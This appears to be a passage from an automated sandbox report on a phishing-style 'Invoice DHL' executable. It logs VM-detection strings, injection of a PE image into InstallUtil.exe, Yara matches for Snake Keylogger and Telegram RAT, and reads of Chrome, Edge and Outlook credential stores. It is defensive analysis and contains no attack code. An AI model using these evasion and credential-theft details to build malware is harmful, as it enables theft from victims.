Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594269	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Window / User API: threadDelayed 868	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Window / User API: threadDelayed 2714	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8206	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1636	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 1908	Thread sleep count: 868 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 1908	Thread sleep count: 2714 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98530s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904	Thread sleep time: -98299s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6704	Thread sleep count: 8206 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6704	Thread sleep count: 1636 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597342s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -597107s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596996s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595638s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -594390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168	Thread sleep time: -594269s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99327	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98750	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98640	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98530	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 98299	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597342	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594269	Jump to behavior

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd21e85383b951<
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000004.00000002.2938751180.000000000069F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyp
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2035150985.000000000064B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 4_2_05D97B70 LdrInitializeThunk,

4_2_05D97B70

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 420000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D6008	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Queries volume information: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE
